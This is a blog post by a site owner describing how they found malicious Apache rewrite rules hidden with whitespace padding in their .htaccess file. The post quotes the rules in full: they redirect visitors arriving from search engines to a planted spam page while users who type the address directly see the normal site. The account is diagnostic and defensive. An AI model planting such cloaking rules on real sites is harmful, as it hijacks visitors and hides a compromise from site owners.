So the problem is solved. Huzzah and hoorah.
But it’s a weird one. Someone pointed out that, after a bit of packet sniffing, it looked like the dodgy pages actually originated from the genuine IP address. So while the first reaction of any technologist is to blame everyone and anyone else maybe, just maybe, that was a little hasty.
So, out comes PuTTY, and a quick scan of the root directory for that domain later and … that’s odd. The .htaccess file has been changed way more recently than I might have expected (and it’s a little bigger).
8 -rw-r--r-- 1 lowfield users 4961 Oct 24 00:46 .htaccess
Odd, though, because the permissions should make it that it’s only me that can write to that file (644).
But there it is, hidden away padded by loads of whitespace:
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=
RewriteCond %{HTTP_REFERER} =[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <54
RewriteRule ^.*$ /ctte/elire/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
For the benefit of those not fluent in the arcane ways of RegExp and the Apache RewriteEngine, this was basically checking to see if you’d come from a search engine and, if you had, delivering a different page (although only in 90% of instances).
Most times when you click on a link, your browser tells the new website where you came from, known as the REFERRER tag, so this was using that to determine whether to do it. This meant that if people typed in the address, like regular users would, or used a bookmark, they would probably miss the redirection and be none the wiser.
And, to compound the ignominy, it had even written the guilty dodgy page on the local machine and hidden it in a sub-directory off the main directory. So it really was my site to blame.
Seems like I wasn’t the only one either, this is a very similar description and whaddya know,